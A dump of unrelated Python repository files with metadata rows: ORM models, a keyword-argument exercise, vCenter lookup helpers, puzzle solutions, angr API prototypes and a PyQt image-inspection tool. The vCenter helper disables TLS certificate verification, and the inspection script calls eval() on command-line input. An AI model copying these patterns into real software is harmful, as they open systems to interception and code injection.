def __init__(self,nickname='匿名',img_url='http://120.27.163.43:8001/static/common.jpg',sex=1,birthday='1996-06-19',height=None,weight=None,area=""):
self.nickname = nickname
self.img_url = img_url
self.sex = sex
self.birthday = birthday
self.area = area
if height:
self.height = height
else:
self.height = 170 if self.sex else 165
self.weight = weight if weight else 60 if self.sex else 50
'''
def change_info(self,nickname,img_url,sex,age):
self.nickname = nickname
self.img_url = img_url
self.sex = sex
self.age = age
'''
class Event(Base):
__tablename__ = 'events'
id = Column(String(50),primary_key=True)
title = Column(Text)
loc_x = Column(Float)
loc_y = Column(Float)
loc_province = Column(String(20))
loc_distract = Column(String(1000))
loc_city = Column(String(30))
loc_road = Column(String(400))
desc = Column(Text)
person_limit = Column(Integer)
person_current= Column(Integer)
start_time = Column(String(20))
during_time = Column(String(20))
type = Column(Integer)
logo = Column(String(3000))
host = Column(Integer,ForeignKey('userinfo.id'))
points = relationship("Points",backref='point_event',cascade='save-update,merge,delete')
userinfo_id = relationship(
'UserEvent',
backref = 'the_event',
passive_deletes = True
)
def __init__(self,title=None,desc=None,start_time=None,
during_time=60,loc_x=None,loc_y=None,
loc_province=None,person_limit=50,
c_distract=None,loc_road=None,loc_city=None,
logo=None,host=None,type=0):
self.id = str(uuid.uuid4())
self.title = title
self.desc = desc
self.start_time = start_time
self.during_time= during_time
self.loc_x = loc_x
self.loc_y = loc_y
self.loc_province = loc_province
self.loc_road = loc_road
self.loc_distract = loc_distract
self.loc_city = loc_city
self.person_limit = person_limit
self.person_current = 0
self.logo = logo
self.host = host
self.type = type
def __repr__(self):
return "<Event (id='%s',title='%s')"%(self.id,self.title)
class Points(Base):
__tablename__ = 'points'
id = Column(Integer,primary_key=True)
x = Column(Float)
y = Column(Float)
message = Column(Text())
radius = Column(Float)
type = Column(Integer)
order = Column(Integer)
event_re = Column(String(50),ForeignKey('events.id'))
def __init__(self,x=None,y=None,message=None,radius=None,order=None,type=1):
self.x = x
self.y = y
self.order = order
self.radius = radius
self.message = message
self.type=type
'''
class EventDetail(Base):
__tablename__ = 'eventdetail'
id = Column(Integer,primary_key=True)
event_re = Column(String(50),ForeignKey('events.id'))
'''
if __name__ == '__main__':
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
| [
"1152761042@qq.com"
] | 1152761042@qq.com |
5f06320ea1348040f92e9b3d949bae91e0e5f7a1 | deb08f802e3fdfbe9e1918ff12cc755cbd2a679f | /2_CH/Keyword.py | 746a45836ddb422b186b3a26e7470b24f7240581 | [] | no_license | t-a-y-l-o-r/Effective_Python | b6cf9d197664b64635f131fab503494387b13257 | 84ac7b1fb3e3a8ce7c64b865f7e5fbfb03159368 | refs/heads/master | 2021-01-24T19:38:43.985278 | 2018-03-22T23:24:33 | 2018-03-22T23:24:33 | 123,243,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,397 | py | '''
Author: Taylor Cochran
Book: Effective Python
Ch: 2
goal: Enforce clarity with Keyword-only arguments
'''
# division that ignores errors
# requires the user to remember the position of each argument
# possibly resulting in sublte bugs down the line
def safe_division(number, divisior, ignore_overflow, ignore_zero_division):
try:
return number / divisior
except OverflowError:
if ignore_overflow:
return 0
else:
raise
except ZeroDivisionError:
if ignore_zero_division:
return float("inf")
else:
raise
# result = safe_division(1.0, 10**500, True, False)
# print(result)
# result = safe_division(1.0, 0, False, True)
# print(result)
# instead FORCE keyword arguments to be passed, resulting in clear intention
def safe_division(number, divisior, *,
ignore_overflow=False, ignore_zero_division=False):
'''Divides the two numbers passed.
Args:
number: The numerator
divisor: The divisor
ingore_overflow: returns 0 if True, raises OverflowError otherwise.
Defaults to False.
ignore_zero_division: returns inf if True, raises ZeroDivisionError otherwise.
Defaults to False.
'''
try:
return number / divisior
except OverflowError:
if ignore_overflow:
return 0
else:
raise
except ZeroDivisionError:
if ignore_zero_division:
return float("inf")
else:
raise
| [
"taylorjcochran@hotmail.com"
] | taylorjcochran@hotmail.com |
3cd515eca280170fe3a32456a2936ef77006c086 | 286b6dc56323f982092ffafbfac8a32dbbaeb7ef | /Day_09/sample_pyvmomi.py | 10033c34292fb7b9d33af55fc34b5e48284d85bb | [] | no_license | learndevops19/pythonTraining-CalsoftInc | ccee0d90aadc00bfdb17f9578620f6bf92f80a4c | c5f61516b835339b394876edd1c6f62e7cc6f0c3 | refs/heads/master | 2021-02-05T04:27:17.590913 | 2019-11-20T17:27:06 | 2019-11-20T17:27:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,761 | py | import ssl
from pyVim import connect
from pyVmomi import vim
def connectVcenter(vCenterHost, username, password, portNum=443):
"""
Description : Performs vCenter connection.
Parameters : vCenterHost - vCenter server ip address (STRING)
username - vCenter server username (STRING)
password - vCenter server password (STRING)
portNum - Port number for connection, default is 443 (INT)
Returns : Service instance object
"""
context = ssl._create_unverified_context()
si = connect.SmartConnect(
host=vCenterHost, user=username, pwd=password, port=portNum, sslContext=context
)
return si
def getObj(content, vimtype, name):
"""
Description: Get the vsphere object associated with a given text name
Parameters : content - Data object having properties for the
ServiceInstance managed object (OBJECT)
vimtype - Managed object type (OBJECT)
name - Managed object entity name (STRING)
Return: Matched Managed object (OBJECT)
"""
container = content.viewManager.CreateContainerView(
content.rootFolder, vimtype, True
)
for vmObj in container.view:
if vmObj.name == name:
return vmObj
def getDatacenterByName(si, name):
"""
Description: Find a datacenter by it's name and return it
Parameters : si - vCenter connection session (OBJECT)
name - datacenter name (STRING)
Return: datacenter Object (OBJECT)
"""
return getObj(si.RetrieveContent(), [vim.Datacenter], name)
def getClusterByName(si, name):
"""
Description: Find a cluster by it's name and return it
Parameters : si - vCenter connection session (OBJECT)
name - cluster name (STRING)
Return: cluster Object (OBJECT)
"""
return getObj(si.RetrieveContent(), [vim.ClusterComputeResource], name)
def getHostByName(si, name):
"""
Description: Find a host by it's name and return it
Parameters : si - vCenter connection session (OBJECT)
name - host name (STRING)
Return: host Object (OBJECT)
"""
return getObj(si.RetrieveContent(), [vim.HostSystem], name)
def getVirtualMachineByName(si, name):
"""
Description: Find a vm by it's name and return it
Parameters : si - vCenter connection session (OBJECT)
name - vm name (STRING)
Return: virtual machine Object (OBJECT)
"""
return getObj(si.RetrieveContent(), [vim.VirtualMachine], name)
def getDatastoreByName(si, name):
"""
Description: Find a datastore by it's name and return it
Parameters : si - vCenter connection session (OBJECT)
name - datastore name (STRING)
Return: datastore Object (OBJECT)
"""
return getObj(si.RetrieveContent(), [vim.Datastore], name)
def getNetworkByName(si, name, isVDS=False):
"""
Description: Find a network by it's name and return it
Parameters : si - vCenter connection session (OBJECT)
name - network name (STRING)
Return: network Object
"""
if isVDS is False:
networkObj = getObj(si.RetrieveContent(), [vim.Network], name)
else:
networkObj = getObj(
si.RetrieveContent(), [vim.dvs.DistributedVirtualPortgroup], name
)
return networkObj
# connect vcenter
siObj = connectVcenter(vcenterIp, vcenterUsername, vcenterPassword)
# print(siObj.content.about)
# get datacenter by name
datacenterName = "UCP CI Datacenter"
datacenterObj = getDatacenterByName(siObj, datacenterName)
print("datacenterName is", datacenterObj.name, datacenterObj.datastore[0].name)
# get cluster by name
# clusterName = 'Dockerized'
# clusterObj = getClusterByName(siObj, clusterName)
# print("clusterName is", clusterObj.name)
# get host by name
# hostName = '192.168.25.205'
# hostObj = getHostByName(siObj, hostName)
# print("hostName is", hostObj.name)
# get datastore by name
# datastoreName = 'ds1'
# datastoreObj = getDatastoreByName(siObj, datastoreName)
# print("datastoreName is", datastoreObj.name)
# get network by name
# networkName = 'VM Network'
# networkObj = getNetworkByName(siObj, networkName)
# print("networkName is", networkObj.name)
# print("Vm's in this network", [vm.name for vm in networkObj.vm])
# get all vms inside datacenter
# vmsList = datacenterObj.vmFolder.childEntity
# for vm in vmsList:
# print("Virtual Machine - ", vm.name)
# get vm by name
# vmObj = getVirtualMachineByName(siObj, 'k8s-master')
# print('VirtualMachineName', vmObj.name, dir(vmObj))
# poweroff the above virtual machine
# vmObj.PowerOff()
# poweron the above virtual machine
# vmObj.PowerOn()
| [
"rajpratik71@gmail.com"
] | rajpratik71@gmail.com |
f23d62dafdbb77a295d93ac632a4441e517a6c10 | c92d5b8509f23444622529aa24d4bc85bf1d3c9f | /main/question47/book1.py | 44b832b082eb8ed9403996e4f3f5e5ee8a3f4ad1 | [] | no_license | qcymkxyc/JZoffer | 75dfb747394018f14552f521413b01a5faa9c07f | 28628616589061653a8322d5b400f9af32f2249d | refs/heads/master | 2021-07-15T00:53:00.711360 | 2019-02-10T03:16:52 | 2019-02-10T03:16:52 | 149,714,958 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 926 | py | #!/usr/bin/env python
# _*_coding:utf-8_*_
"""
@Time : 19-1-24 上午10:58
@Author: qcymkxyc
@File: book1.py
@Software: PyCharm
"""
def max_value(matrix):
"""
动态规划
:param matrix: List[List[int]]
矩阵
:return: int
最大值
"""
n_row, n_col = len(matrix), len(matrix[0])
value_matrix = list()
for i, v in enumerate(matrix):
value_matrix.append([0] * len(v))
# 第一行初始化
for i in range(n_col):
value_matrix[0][i] += sum(matrix[0][:i + 1])
# 第一列初始化
for row in range(n_row):
value_matrix[row][0] = sum(map(lambda x:x[0], matrix[:row + 1]))
for row in range(1,n_row):
for col in range(1,n_col):
value_matrix[row][col] = max(value_matrix[row - 1][col], value_matrix[row][col - 1]) + \
matrix[row][col]
return value_matrix[-1][-1]
| [
"qcymkxyc@163.com"
] | qcymkxyc@163.com |
8168b5bf889b97e447da255e86d69e116f571d47 | c8975f8bbe32637399a3ca00ad21e8e6602e358d | /aoc/year2021/day14/day14.py | bf40f0314c32c659180cf4eaa5ae69c3475ea98d | [
"Unlicense"
] | permissive | Godsmith/adventofcode | 0e8e0beb813300206b2810b523b54a6c40ca936f | 3c59ea66830f82b63881e0ea19bfe3076f2a500d | refs/heads/master | 2021-12-28T13:05:42.579374 | 2021-12-26T22:19:55 | 2021-12-26T22:24:01 | 225,074,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py | from collections import Counter
from aocd import get_data
from more_itertools import pairwise
def run(data, iterations):
new_element_from_pair = {tuple(line.split(" -> ")[0]): line.split(" -> ")[1] for line in data.splitlines()[2:]}
new_pairs_from_pair = {(e1, e2): [(e1, inserted), (inserted, e2)] for (e1, e2), inserted in new_element_from_pair.items()}
template = data.splitlines()[0]
element_counter = Counter(template)
pair_counter = Counter(pairwise(template))
for _ in range(iterations):
new_pair_counter = Counter()
for pair in pair_counter:
for new_pair in new_pairs_from_pair[pair]:
new_pair_counter[new_pair] += pair_counter[pair]
element_counter[new_element_from_pair[pair]] += pair_counter[pair]
pair_counter = new_pair_counter
return element_counter.most_common()[0][1] - element_counter.most_common()[-1][1]
print(run(get_data(), 10))
print(run(get_data(), 40))
| [
"filip.lange@gmail.com"
] | filip.lange@gmail.com |
5802eeeb0ab8d6f8d89deb95c876c1ac27840b2a | 4fc9cb4cf01e41c4ed3de89f13d213e95c87dd33 | /angr/procedures/definitions/win32_wdsclientapi.py | dcbb07c74c314d0c5708a98cc0f55187713044fc | [
"BSD-2-Clause"
] | permissive | mborgerson/angr | ea5daf28576c3d31b542a0e229139ab2494326e9 | 8296578e92a15584205bfb2f7add13dd0fb36d56 | refs/heads/master | 2023-07-24T22:41:25.607215 | 2022-10-19T19:46:12 | 2022-10-20T18:13:31 | 227,243,942 | 1 | 2 | BSD-2-Clause | 2021-04-07T22:09:51 | 2019-12-11T00:47:55 | Python | UTF-8 | Python | false | false | 14,784 | py | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("wdsclientapi.dll")
prototypes = \
{
#
'WdsCliClose': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Handle"]),
#
'WdsCliRegisterTrace': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="SByte"), offset=0)], SimTypeBottom(label="Void"), arg_names=["pwszFormat", "Params"]), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pfn"]),
#
'WdsCliFreeStringArray': SimTypeFunction([SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["ppwszArray", "ulCount"]),
#
'WdsCliFindFirstImage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "phFindHandle"]),
#
'WdsCliFindNextImage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Handle"]),
#
'WdsCliGetEnumerationFlags': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Handle", "pdwFlags"]),
#
'WdsCliGetImageHandleFromFindHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["FindHandle", "phImageHandle"]),
#
'WdsCliGetImageHandleFromTransferHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hTransfer", "phImageHandle"]),
#
'WdsCliCreateSession': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"pwszUserName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pwszDomain": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pwszPassword": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="WDS_CLI_CRED", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pwszServer", "pCred", "phSession"]),
#
'WdsCliAuthorizeSession': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"pwszUserName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pwszDomain": SimTypePointer(SimTypeChar(label="Char"), offset=0), "pwszPassword": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="WDS_CLI_CRED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "pCred"]),
#
'WdsCliInitializeLog': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="CPU_ARCHITECTURE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "ulClientArchitecture", "pwszClientId", "pwszClientAddress"]),
#
'WdsCliLog': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "ulLogLevel", "ulMessageCode"]),
#
'WdsCliGetImageName': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageDescription': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageType': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="WDS_CLI_IMAGE_TYPE"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pImageType"]),
#
'WdsCliGetImageFiles': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pppwszFiles", "pdwCount"]),
#
'WdsCliGetImageLanguage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageLanguages': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypePointer(SimTypeChar(label="SByte"), offset=0), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pppszValues", "pdwNumValues"]),
#
'WdsCliGetImageVersion': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImagePath': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageIndex': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pdwValue"]),
#
'WdsCliGetImageArchitecture': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="CPU_ARCHITECTURE"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pdwValue"]),
#
'WdsCliGetImageLastModifiedTime': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimStruct({"wYear": SimTypeShort(signed=False, label="UInt16"), "wMonth": SimTypeShort(signed=False, label="UInt16"), "wDayOfWeek": SimTypeShort(signed=False, label="UInt16"), "wDay": SimTypeShort(signed=False, label="UInt16"), "wHour": SimTypeShort(signed=False, label="UInt16"), "wMinute": SimTypeShort(signed=False, label="UInt16"), "wSecond": SimTypeShort(signed=False, label="UInt16"), "wMilliseconds": SimTypeShort(signed=False, label="UInt16")}, name="SYSTEMTIME", pack=False, align=None), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppSysTimeValue"]),
#
'WdsCliGetImageSize': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pullValue"]),
#
'WdsCliGetImageHalName': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageGroup': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageNamespace': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ppwszValue"]),
#
'WdsCliGetImageParameter': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="WDS_CLI_IMAGE_PARAM_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "ParamType", "pResponse", "uResponseLen"]),
#
'WdsCliGetTransferSize': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hIfh", "pullValue"]),
#
'WdsCliSetTransferBufferSize': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeBottom(label="Void"), arg_names=["ulSizeInBytes"]),
#
'WdsCliTransferImage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeFunction([SimTypeInt(signed=False, label="PFN_WDS_CLI_CALLBACK_MESSAGE_ID"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeBottom(label="Void"), arg_names=["dwMessageId", "wParam", "lParam", "pvUserData"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hImage", "pwszLocalPath", "dwFlags", "dwReserved", "pfnWdsCliCallback", "pvUserData", "phTransfer"]),
#
'WdsCliTransferFile': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeFunction([SimTypeInt(signed=False, label="PFN_WDS_CLI_CALLBACK_MESSAGE_ID"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeBottom(label="Void"), arg_names=["dwMessageId", "wParam", "lParam", "pvUserData"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pwszServer", "pwszNamespace", "pwszRemoteFilePath", "pwszLocalFilePath", "dwFlags", "dwReserved", "pfnWdsCliCallback", "pvUserData", "phTransfer"]),
#
'WdsCliCancelTransfer': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hTransfer"]),
#
'WdsCliWaitForTransfer': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hTransfer"]),
#
'WdsCliObtainDriverPackages': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hImage", "ppwszServerName", "pppwszDriverPackages", "pulCount"]),
#
'WdsCliObtainDriverPackagesEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), SimTypePointer(SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hSession", "pwszMachineInfo", "ppwszServerName", "pppwszDriverPackages", "pulCount"]),
#
'WdsCliGetDriverQueryXml': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pwszWinDirPath", "ppwszDriverQuery"]),
}
lib.set_prototypes(prototypes)
| [
"noreply@github.com"
] | noreply@github.com |
a9e19bfcc0e74994f1eb9372e893415376fb7333 | 54bbfcd35f93ea035fa33d4567bb61b9f9972c86 | /detection_tool/demo_xor.py | dc938eac71baad2aa237cc4b39caf527039ba17a | [] | no_license | seunghan-ga/IDA | 88100643fb7b07802985dad57052614ced573c6a | 2b3f7408133ee12dc5178281117f9305ad85eb5e | refs/heads/master | 2022-12-11T23:56:08.766957 | 2020-08-12T05:20:36 | 2020-08-12T05:20:36 | 241,831,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,930 | py | import argparse
import shutil
import time
import cv2
import sys
import os
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QDialog
from PyQt5.QtWidgets import QProgressBar
from PyQt5.QtCore import QThread
from PyQt5.QtCore import pyqtSignal
from tqdm import tqdm
from detection_tool.transformation.image_function import Image
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--individual_path', help='Individual inspection progress', nargs='+', default=[])
parser.add_argument("-c", "--class_info", help="Class information.")
parser.add_argument("-p", "--path_info", help="Path information.")
args = parser.parse_args()
TIME_LIMIT = 100
class External(QThread):
"""Runs a counter thread."""
countChanged = pyqtSignal(int)
def run(self):
count = 0
self.countChanged.emit(count)
s = time.time()
path_info = eval(args.path_info)
class_info = eval(args.class_info)
crop_path = os.path.abspath(path_info['crop_path'])
origin_path = os.path.abspath(path_info['origin_path'])
normal_path = os.path.abspath(path_info['xor_normal_path'])
result_path = os.path.abspath(path_info['xor_result_path'])
test_path = os.path.abspath(path_info['xor_test_path'])
labeled_path = os.path.abspath(path_info['labeled_path'])
classes = class_info.values()
if os.path.exists(crop_path):
shutil.rmtree(crop_path)
if os.path.exists(origin_path):
shutil.rmtree(origin_path)
if os.path.exists(result_path):
shutil.rmtree(result_path)
if os.path.exists(labeled_path):
shutil.rmtree(labeled_path)
print('\n ******************' + 'Start Defect Inspection' + '******************')
for defect in classes:
count += 100 / len(classes)
print('\n ----------------' + defect + '----------------')
_test_path = os.path.abspath(os.path.join(test_path, defect))
files = os.listdir(_test_path) if os.path.exists(_test_path) else []
if not os.path.exists(crop_path):
os.makedirs(crop_path)
if not os.path.exists(origin_path):
os.makedirs(origin_path)
if not os.path.exists(result_path):
os.makedirs(result_path)
if not os.path.exists(os.path.abspath(os.path.join(origin_path, defect))):
os.mkdir(os.path.abspath(os.path.join(origin_path, defect)))
tot_sum = 0
for i in tqdm(range(len(files))):
if str(os.path.join(_test_path, files[i])).replace('\\', '/') in args.individual_path:
tot_sum += i
test_image = cv2.imread(os.path.join(_test_path, files[i]))
test_filename = files[i].split('_')[0] + '.JPG'
ref_image = cv2.imread(os.path.join(normal_path, test_filename))
transform_image = Image().registriation(test_image, ref_image)
diff_image = Image().image_comparison(transform_image, ref_image)
filtered_image = Image().image_filter(diff_image)
_, _ = Image().image_defect(filtered_image, transform_image, size=32,
correction=20,
filename1=files[i].split('.')[0],
filename2=files[i],
crop_path=os.path.join(crop_path,),
origin_path=os.path.join(origin_path, defect),
result_path=result_path)
self.countChanged.emit(count)
print('\n 검출 파일 수 : ' + str(tot_sum))
print('\n ******************' + 'Defect Extraction Completed' + '*************************')
e = time.time()
print(e - s)
class Actions(QDialog):
"""진행률 표시 줄과 버튼으로 구성된 다이얼로그 박스."""
def __init__(self):
super().__init__()
self.progress = None
self.calc = None
self.initUI()
def initUI(self):
self.setWindowTitle('Defect Inspection in progress')
self.progress = QProgressBar(self)
self.progress.setGeometry(0, 0, 300, 25)
